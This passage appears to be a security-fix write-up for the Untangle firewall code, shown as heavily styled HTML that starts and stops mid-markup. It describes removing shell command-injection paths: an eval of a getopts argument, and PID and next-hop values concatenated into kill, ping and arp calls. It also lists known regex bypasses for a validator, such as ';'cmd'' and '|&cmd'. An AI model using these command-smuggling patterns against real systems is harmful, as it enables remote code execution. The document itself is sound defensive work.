204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h3 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Fix 2 —<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">uvm/hier/usr/share/untangle/bin/interface-mapping.sh</code></h3><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Vulnerability:</strong> <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">v) eval "${OPTARG}" ;;</code> in the <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">getopts</code> loop evaluated arbitrary shell code passed as the <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">-v</code> argument. No current production caller uses <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">-v</code>, but any future caller passing user-controlled data via <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">-v</code> would result in unconditional RCE.</p><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Fix:</strong></p><ul style="padding-inline-start: 2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><li>Removed<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">v:</code><span> </span>from the<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">getopts</code><span> </span>option string</li><li>Removed the<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">v) eval "${OPTARG}" ;;</code><span> </span>case arm entirely</li></ul><hr style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h3 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Fix 3 —<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnManager.java</code></h3><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Vulnerability:</strong> PID files read from <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">/run/tunnelvpn/</code> were stripped of only <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">\r\n</code> and concatenated directly into <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execOutput("kill -INT " + pid)</code>. While the PID directory is root-controlled, the correct pattern is numeric validation before use.</p><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Fix (both <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">killProcesses()</code> and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">recycleTunnel()</code> sites):</strong></p><ul style="padding-inline-start: 2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><li><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">.replaceAll("(\r|\n)", "")</code><span> </span>replaced with<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">.trim()</code></li><li>PID validated against<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">\d{1,10}</code><span> </span>before any exec call — covers Linux<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">PID_MAX_LIMIT</code><span> </span>(4,194,304 today) with headroom for future kernel bumps. Invalid PID: log warn, skip kill, clean up file.</li><li><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execOutput("kill -INT " + pid)</code><span> </span>replaced with<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execCommand("/bin/kill", List.of("-INT", pid))</code><span> </span>— shell entirely removed from the path</li></ul><hr style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h3 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Fix 4a —<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">uvm/impl/com/untangle/uvm/NotificationManagerImpl.java</code></h3><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Vulnerability:</strong> <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">route.getNextHop()</code> was concatenated into <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execResult("ping -c1 -W1 " + ...)</code> and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execResult(".../ut-notification-helpers.sh testRoutesToReachableAddresses1 " + ...)</code>. <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">SafeCheckValidator</code> (applied at the JSON-RPC boundary) has documented regex bypasses for <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">;'cmd'</code>, <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">|"cmd"</code>, <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">|&amp;cmd</code>, bare <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">$VAR</code>, and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">&lt;&lt;</code> heredoc, meaning a crafted <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">nextHop</code> value could reach the shell.</p><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Fix (<code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">testRoutesToReachableAddresses()</code>):</strong></p><ul style="padding-inline-start: 2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><li><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">nextHop</code><span> </span>cached to a local variable (single<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">getNextHop()</code><span> </span>call)</li><li>Dotted-quad regex guard added at the call site as defense-in-depth — offline check, no DNS resolution, matches the<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">getToAddr()</code><span> </span>contract already gating the loop</li><li>All three exec calls converted from<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execResult(String)</code><span> </span>to<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execCommand(cmd, List.of(...))</code><span> </span>with<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">/bin/ping</code><span> </span>using an absolute path</li><li><strong>Silent bug fixed:</strong><span> </span>the original code assigned ping's exit code to<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">result</code><span> </span>and immediately overwrote it with the next<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execResult</code><span> </span>call — ping's result was always discarded. The new code makes the intent explicit by not capturing ping's return value (ping is called solely to force ARP resolution; only the subsequent ARP recheck result is used).</li></ul><h3 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Fix 4b —<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">uvm/hier/usr/share/untangle/bin/ut-notification-helpers.sh</code></h3><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">arp -n $2</code> → <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">arp -n "$2"</code> in both <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">testRoutesToReachableAddresses1</code> and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">testRoutesToReachableAddresses2</code>. Prevents word-splitting of the <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">nextHop</code> argument inside the script (e.g. <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">"192.0.2.1 -V"</code> passing <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">-V</code> as a flag to <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">arp</code>).</p><hr style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h3 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Fix 5 —<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">tunnel-vpn/src/com/untangle/app/tunnel_vpn/TunnelVpnApp.java</code></h3><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Pattern:</strong> <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execOutput("rm -r -f " + path)</code> in <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">cleanTunnelSettings()</code>. The path is constrained upstream by <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">Integer.valueOf(idString)</code> (throws on non-numeric), so this is not an active exploit path. Removed the shell anti-pattern regardless.</p><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><strong>Fix:</strong> <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execCommand("/bin/rm", List.of("-rf", path))</code> — same behavior, no shell.</p><hr style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h3 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Supporting change —<span> </span><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">uvm/hier/usr/share/untangle/bin/ut-exec-safe-launcher</code></h3><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Added <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">/bin/kill</code>, <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">/bin/ping</code>, <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">/bin/rm</code>, and <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">/usr/share/untangle/bin/ut-notification-helpers.sh</code> to the <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">ALLOWED_EXECUTABLES</code> allowlist. Required to support the new <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">execCommand</code> calls introduced in Fixes 3, 4a, and 5.</p><hr style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h2 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Out of scope</h2><p style="white-space: pre-wrap; margin-top: 0.1em; margin-bottom: 0.2em; color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">ut-notification-helpers.sh</code> contains three functions (<code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">testBridgeBackwards1</code>, <code style="font-family: 